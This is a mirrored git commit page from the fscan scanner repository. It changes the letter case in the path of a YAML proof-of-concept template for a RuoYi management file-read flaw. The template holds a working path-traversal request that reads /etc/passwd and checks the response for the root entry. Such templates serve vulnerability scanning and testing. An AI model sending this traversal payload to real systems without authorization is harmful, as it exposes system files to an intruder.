mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-22 03:10:42 +08:00
Update ruoyi-management-fileread.yml
This commit is contained in:
@@ -2,7 +2,7 @@ name: poc-yaml-ruoyi-management-fileread
|
||||
groups:
|
||||
linux:
|
||||
- method: GET
|
||||
path: /Common/download/resource?resource=/profile/../../../../etc/passwd
|
||||
path: /common/download/resource?resource=/profile/../../../../etc/passwd
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
windows:
|
||||
|
||||
Reference in New Issue
Block a user